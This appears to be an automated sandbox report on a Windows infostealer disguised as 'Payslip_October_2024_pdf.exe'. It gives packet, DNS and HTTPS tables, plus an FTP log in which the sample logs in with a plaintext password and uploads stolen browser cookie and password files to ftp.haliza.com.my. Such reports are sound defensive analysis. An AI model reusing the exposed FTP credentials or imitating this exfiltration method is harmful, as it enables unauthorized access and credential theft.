                                            Nov 4, 2024 10:16:30.526921034 CET6000350020110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:30.526933908 CET5002060003192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:30.527000904 CET6000350020110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:30.527051926 CET5002060003192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:30.527064085 CET6000350020110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:30.527105093 CET5002060003192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:30.527348995 CET6000350020110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:30.528774977 CET5002060003192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:30.531923056 CET6000350020110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:30.531934023 CET6000350020110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:30.531949043 CET6000350020110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:30.531960011 CET6000350020110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:30.532118082 CET6000350020110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:30.532193899 CET6000350020110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:30.532206059 CET6000350020110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:30.533652067 CET6000350020110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:30.533763885 CET6000350020110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:30.534280062 CET6000350020110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:30.537852049 CET5002060003192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:30.594424963 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:31.032507896 CET5000421192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:31.037321091 CET2150004110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:31.262309074 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:31.368158102 CET2150004110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:31.368757010 CET5002153556192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:31.373636007 CET5355650021110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:31.373703003 CET5002153556192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:31.373780012 CET5000421192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:31.378555059 CET2150004110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:31.399874926 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:32.277887106 CET2150004110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:32.278115034 CET5002153556192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:32.283596992 CET5355650021110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:32.283606052 CET5355650021110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:32.283615112 CET5355650021110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:32.283624887 CET5355650021110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:32.283632040 CET5355650021110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:32.283715963 CET5002153556192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:32.283752918 CET5355650021110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:32.283761978 CET5355650021110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:32.283771038 CET5355650021110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:32.283893108 CET5355650021110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:32.283900976 CET5355650021110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:32.284140110 CET5002153556192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:32.289246082 CET5355650021110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:32.289254904 CET5355650021110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:32.289264917 CET5355650021110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:32.289274931 CET5355650021110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:32.289284945 CET5355650021110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:32.289294004 CET5355650021110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:32.289325953 CET5002153556192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:32.289381981 CET5355650021110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:32.289539099 CET5355650021110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:32.289546013 CET5002153556192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:32.289547920 CET5355650021110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:32.289752960 CET5355650021110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:32.289761066 CET5002153556192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:32.289762020 CET5355650021110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:32.289772987 CET5355650021110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:32.294791937 CET5355650021110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:32.294801950 CET5355650021110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:32.294917107 CET5355650021110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:32.294926882 CET5355650021110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:32.294935942 CET5355650021110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:32.295068026 CET5355650021110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:32.295077085 CET5355650021110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:32.295208931 CET5355650021110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:32.295217991 CET5355650021110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:32.295353889 CET5355650021110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:32.295362949 CET5355650021110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:32.295665979 CET5355650021110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:32.298237085 CET5002153556192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:32.418055058 CET5000421192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:33.051167011 CET2150004110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:33.103003025 CET5000421192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:39.517585993 CET5000421192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:39.522532940 CET2150004110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:39.854044914 CET2150004110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:39.866190910 CET5002252591192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:39.871131897 CET5259150022110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:39.874892950 CET5002252591192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:39.875107050 CET5000421192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:39.879945040 CET2150004110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:40.778814077 CET2150004110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:40.780551910 CET5002252591192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:40.785537958 CET5259150022110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:40.785551071 CET5259150022110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:40.785567999 CET5259150022110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:40.785588026 CET5259150022110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:40.785598993 CET5259150022110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:40.785643101 CET5259150022110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:40.785654068 CET5002252591192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:40.785684109 CET5259150022110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:40.785696983 CET5259150022110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:40.785698891 CET5002252591192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:40.785726070 CET5259150022110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:40.785756111 CET5259150022110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:40.785765886 CET5002252591192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:40.785804033 CET5002252591192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:40.786154985 CET5002252591192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:40.790534973 CET5259150022110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:40.790545940 CET5259150022110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:40.790565014 CET5259150022110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:40.790575027 CET5259150022110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:40.790582895 CET5259150022110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:40.790617943 CET5002252591192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:40.790647984 CET5259150022110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:40.790657043 CET5002252591192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:40.790851116 CET5259150022110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:40.790946960 CET5002252591192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:40.790999889 CET5259150022110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:40.791184902 CET5002252591192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:40.795469046 CET5259150022110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:40.795572042 CET5259150022110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:40.795582056 CET5259150022110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:40.795768976 CET5259150022110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:40.795778990 CET5259150022110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:40.795862913 CET5259150022110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:40.795874119 CET5259150022110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:40.795886040 CET5259150022110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:40.796037912 CET5259150022110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:40.800203085 CET5259150022110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:40.800540924 CET5259150022110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:40.804433107 CET5002252591192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:40.864317894 CET5000421192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:41.545667887 CET2150004110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:41.628184080 CET5000421192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:49.846080065 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:49.851043940 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:50.204061985 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:50.208184958 CET5002356946192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:50.213139057 CET5694650023110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:50.213270903 CET5002356946192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:50.213270903 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:50.218210936 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:51.127051115 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:51.127433062 CET5002356946192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:51.132412910 CET5694650023110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:51.132424116 CET5694650023110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:51.132431984 CET5694650023110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:51.132491112 CET5002356946192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:51.132570028 CET5694650023110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:51.132579088 CET5694650023110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:51.132587910 CET5694650023110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:51.132596970 CET5694650023110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:51.132607937 CET5694650023110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:51.132612944 CET5002356946192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:51.132627010 CET5694650023110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:51.132628918 CET5002356946192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:51.132642984 CET5002356946192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:51.132647991 CET5694650023110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:51.132653952 CET5002356946192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:51.132669926 CET5002356946192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:51.132699013 CET5002356946192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:51.137434959 CET5694650023110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:51.137444973 CET5694650023110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:51.137490034 CET5002356946192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:51.137521029 CET5694650023110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:51.137572050 CET5002356946192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:51.137643099 CET5694650023110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:51.137651920 CET5694650023110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:51.137695074 CET5002356946192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:51.137696981 CET5694650023110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:51.137708902 CET5694650023110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:51.137734890 CET5002356946192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:51.137756109 CET5694650023110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:51.137756109 CET5002356946192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:51.137765884 CET5694650023110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:51.137774944 CET5694650023110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:51.137797117 CET5694650023110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:51.137830019 CET5002356946192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:51.137854099 CET5694650023110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:51.138060093 CET5694650023110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:51.142457962 CET5694650023110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:51.142467976 CET5694650023110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:51.142479897 CET5694650023110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:51.142488956 CET5694650023110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:51.142568111 CET5694650023110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:51.142621994 CET5694650023110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:51.142659903 CET5694650023110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:51.142776012 CET5694650023110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:51.142836094 CET5694650023110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:51.142915010 CET5694650023110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:51.143354893 CET5694650023110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:51.143471003 CET5002356946192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:51.196777105 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:51.906769037 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:52.088095903 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:57.504298925 CET5002421192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:57.509278059 CET2150024110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:57.509346962 CET5002421192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:58.451360941 CET2150024110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:58.457046986 CET5002421192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:58.461977959 CET2150024110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:58.812264919 CET2150024110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:58.816231012 CET5002421192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:58.821039915 CET2150024110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:59.197164059 CET2150024110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:59.197314024 CET5002421192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:59.202229023 CET2150024110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:59.552597046 CET2150024110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:59.552714109 CET5002421192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:59.557606936 CET2150024110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:00.009773016 CET2150024110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:00.012265921 CET5002421192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:17:00.017357111 CET2150024110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:00.412107944 CET2150024110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:00.412257910 CET5002421192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:17:00.417119026 CET2150024110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:00.767286062 CET2150024110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:00.773122072 CET5002549933192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:17:00.899893045 CET5002421192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:17:01.025422096 CET2150024110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:01.025461912 CET4993350025110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:01.025481939 CET5002421192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:17:01.025527954 CET5002549933192.168.2.5110.4.45.197
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 4, 2024 10:13:01.644409895 CET | 51372 | 53 | 192.168.2.5 | 1.1.1.1
Nov 4, 2024 10:13:01.651252985 CET | 53 | 51372 | 1.1.1.1 | 192.168.2.5
Nov 4, 2024 10:13:03.203773022 CET | 54978 | 53 | 192.168.2.5 | 1.1.1.1
Nov 4, 2024 10:13:03.459189892 CET | 53 | 54978 | 1.1.1.1 | 192.168.2.5

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 4, 2024 10:13:01.644409895 CET | 192.168.2.5 | 1.1.1.1 | 0x161c | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Nov 4, 2024 10:13:03.203773022 CET | 192.168.2.5 | 1.1.1.1 | 0xa870 | Standard query (0) | ftp.haliza.com.my | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 4, 2024 10:13:01.651252985 CET | 1.1.1.1 | 192.168.2.5 | 0x161c | No error (0) | api.ipify.org |  | 172.67.74.152 | A (IP address) | IN (0x0001) | false
Nov 4, 2024 10:13:01.651252985 CET | 1.1.1.1 | 192.168.2.5 | 0x161c | No error (0) | api.ipify.org |  | 104.26.13.205 | A (IP address) | IN (0x0001) | false
Nov 4, 2024 10:13:01.651252985 CET | 1.1.1.1 | 192.168.2.5 | 0x161c | No error (0) | api.ipify.org |  | 104.26.12.205 | A (IP address) | IN (0x0001) | false
Nov 4, 2024 10:13:03.459189892 CET | 1.1.1.1 | 192.168.2.5 | 0xa870 | No error (0) | ftp.haliza.com.my |  | 110.4.45.197 | A (IP address) | IN (0x0001) | false

                                            • api.ipify.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49706 | 172.67.74.152 | 443 | 528 | C:\Users\user\Desktop\Payslip_October_2024_pdf.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-04 09:13:02 UTC | 155 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Host: api.ipify.org
Connection: Keep-Alive
2024-11-04 09:13:02 UTC | 399 | IN | HTTP/1.1 200 OK
Date: Mon, 04 Nov 2024 09:13:02 GMT
Content-Type: text/plain
Content-Length: 14
Connection: close
Vary: Origin
cf-cache-status: DYNAMIC
Server: cloudflare
CF-RAY: 8dd37c5e9dff2cd6-DFW
server-timing: cfL4;desc="?proto=TCP&rtt=2359&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2816&recv_bytes=769&delivery_rate=1215785&cwnd=251&unsent_bytes=0&cid=3c841d748402eaf4&ts=330&x=0"
2024-11-04 09:13:02 UTC | 14 | IN | Data Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39
Data Ascii: 173.254.250.69


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49715 | 172.67.74.152 | 443 | 6552 | C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-04 09:13:15 UTC | 155 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Host: api.ipify.org
Connection: Keep-Alive
2024-11-04 09:13:15 UTC | 398 | IN | HTTP/1.1 200 OK
Date: Mon, 04 Nov 2024 09:13:15 GMT
Content-Type: text/plain
Content-Length: 14
Connection: close
Vary: Origin
cf-cache-status: DYNAMIC
Server: cloudflare
CF-RAY: 8dd37cb0be47ddb3-DFW
server-timing: cfL4;desc="?proto=TCP&rtt=1176&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2817&recv_bytes=769&delivery_rate=2443881&cwnd=73&unsent_bytes=0&cid=d0663724a7e0a820&ts=528&x=0"
2024-11-04 09:13:15 UTC | 14 | IN | Data Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39
Data Ascii: 173.254.250.69


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49739 | 172.67.74.152 | 443 | 2800 | C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-04 09:13:23 UTC | 155 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Host: api.ipify.org
Connection: Keep-Alive
2024-11-04 09:13:24 UTC | 399 | IN | HTTP/1.1 200 OK
Date: Mon, 04 Nov 2024 09:13:24 GMT
Content-Type: text/plain
Content-Length: 14
Connection: close
Vary: Origin
cf-cache-status: DYNAMIC
Server: cloudflare
CF-RAY: 8dd37ce4bb741442-DFW
server-timing: cfL4;desc="?proto=TCP&rtt=1196&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2817&recv_bytes=769&delivery_rate=2435660&cwnd=251&unsent_bytes=0&cid=54615130f8284974&ts=243&x=0"
2024-11-04 09:13:24 UTC | 14 | IN | Data Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39
Data Ascii: 173.254.250.69


                                            TimestampSource PortDest PortSource IPDest IPCommands
                                            Nov 4, 2024 10:13:04.461606026 CET2149709110.4.45.197192.168.2.5220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 26 of 50 allowed.
                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 26 of 50 allowed.220-Local time is now 17:13. Server port: 21.
                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 26 of 50 allowed.220-Local time is now 17:13. Server port: 21.220-This is a private system - No anonymous login
                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 26 of 50 allowed.220-Local time is now 17:13. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 26 of 50 allowed.220-Local time is now 17:13. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                            Nov 4, 2024 10:13:04.461891890 CET4970921192.168.2.5110.4.45.197USER origin@haliza.com.my
                                            Nov 4, 2024 10:13:04.824552059 CET2149709110.4.45.197192.168.2.5331 User origin@haliza.com.my OK. Password required
                                            Nov 4, 2024 10:13:04.827223063 CET4970921192.168.2.5110.4.45.197PASS JesusChrist007$
                                            Nov 4, 2024 10:13:05.222310066 CET2149709110.4.45.197192.168.2.5230 OK. Current restricted directory is /
                                            Nov 4, 2024 10:13:05.580542088 CET2149709110.4.45.197192.168.2.5504 Unknown command
                                            Nov 4, 2024 10:13:05.580734015 CET4970921192.168.2.5110.4.45.197PWD
                                            Nov 4, 2024 10:13:05.936120987 CET2149709110.4.45.197192.168.2.5257 "/" is your current location
                                            Nov 4, 2024 10:13:05.936284065 CET4970921192.168.2.5110.4.45.197TYPE I
                                            Nov 4, 2024 10:13:06.294846058 CET2149709110.4.45.197192.168.2.5200 TYPE is now 8-bit binary
                                            Nov 4, 2024 10:13:06.295129061 CET4970921192.168.2.5110.4.45.197PASV
                                            Nov 4, 2024 10:13:06.650208950 CET2149709110.4.45.197192.168.2.5227 Entering Passive Mode (110,4,45,197,210,95)
                                            Nov 4, 2024 10:13:06.655981064 CET4970921192.168.2.5110.4.45.197STOR CO_Chrome_Default.txt_user-960781_2024_11_04_04_33_02.txt
                                            Nov 4, 2024 10:13:07.585129976 CET2149709110.4.45.197192.168.2.5150 Accepted data connection
                                            Nov 4, 2024 10:13:07.941498995 CET2149709110.4.45.197192.168.2.5226-File successfully transferred
                                            226-File successfully transferred226 0.356 seconds (measured here), 0.79 Kbytes per second
                                            Nov 4, 2024 10:13:07.942117929 CET4970921192.168.2.5110.4.45.197PASV
                                            Nov 4, 2024 10:13:08.297616005 CET2149709110.4.45.197192.168.2.5227 Entering Passive Mode (110,4,45,197,192,210)
                                            Nov 4, 2024 10:13:08.303241968 CET4970921192.168.2.5110.4.45.197STOR CO_Edge Chromium_Default.txt_user-960781_2024_11_04_10_41_34.txt
                                            Nov 4, 2024 10:13:09.216640949 CET2149709110.4.45.197192.168.2.5150 Accepted data connection
                                            Nov 4, 2024 10:13:09.561566114 CET2149709110.4.45.197192.168.2.5226 File successfully transferred
                                            Nov 4, 2024 10:13:09.561956882 CET4970921192.168.2.5110.4.45.197PASV
                                            Nov 4, 2024 10:13:09.917282104 CET2149709110.4.45.197192.168.2.5227 Entering Passive Mode (110,4,45,197,243,167)
                                            Nov 4, 2024 10:13:09.923052073 CET4970921192.168.2.5110.4.45.197STOR CO_Firefox_v6zchhhv.default-release.txt_user-960781_2024_11_04_13_00_19.txt
                                            Nov 4, 2024 10:13:10.881580114 CET2149709110.4.45.197192.168.2.5150 Accepted data connection
                                            Nov 4, 2024 10:13:11.250051975 CET2149709110.4.45.197192.168.2.5226 File successfully transferred
                                            Nov 4, 2024 10:13:17.191484928 CET2149716110.4.45.197192.168.2.5220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                            220-You are user number 28 of 50 allowed.
                                            220-Local time is now 17:13. Server port: 21.
                                            220-This is a private system - No anonymous login
                                            220-IPv6 connections are also welcome on this server.
                                            220 You will be disconnected after 15 minutes of inactivity.
                                            Nov 4, 2024 10:13:17.191725016 CET4971621192.168.2.5110.4.45.197USER origin@haliza.com.my
                                            Nov 4, 2024 10:13:17.551525116 CET2149716110.4.45.197192.168.2.5331 User origin@haliza.com.my OK. Password required
                                            Nov 4, 2024 10:13:17.551703930 CET4971621192.168.2.5110.4.45.197PASS JesusChrist007$
                                            Nov 4, 2024 10:13:17.936074018 CET2149716110.4.45.197192.168.2.5230 OK. Current restricted directory is /
                                            Nov 4, 2024 10:13:18.294068098 CET2149716110.4.45.197192.168.2.5504 Unknown command
                                            Nov 4, 2024 10:13:18.294240952 CET4971621192.168.2.5110.4.45.197PWD
                                            Nov 4, 2024 10:13:18.651875973 CET2149716110.4.45.197192.168.2.5257 "/" is your current location
                                            Nov 4, 2024 10:13:18.652288914 CET4971621192.168.2.5110.4.45.197TYPE I
                                            Nov 4, 2024 10:13:19.009896040 CET2149716110.4.45.197192.168.2.5200 TYPE is now 8-bit binary
                                            Nov 4, 2024 10:13:19.013953924 CET4971621192.168.2.5110.4.45.197PASV
                                            Nov 4, 2024 10:13:19.375341892 CET2149716110.4.45.197192.168.2.5227 Entering Passive Mode (110,4,45,197,241,117)
                                            Nov 4, 2024 10:13:19.381402969 CET4971621192.168.2.5110.4.45.197STOR PW_user-960781_2024_11_04_04_13_15.html
                                            Nov 4, 2024 10:13:20.357707024 CET2149716110.4.45.197192.168.2.5150 Accepted data connection
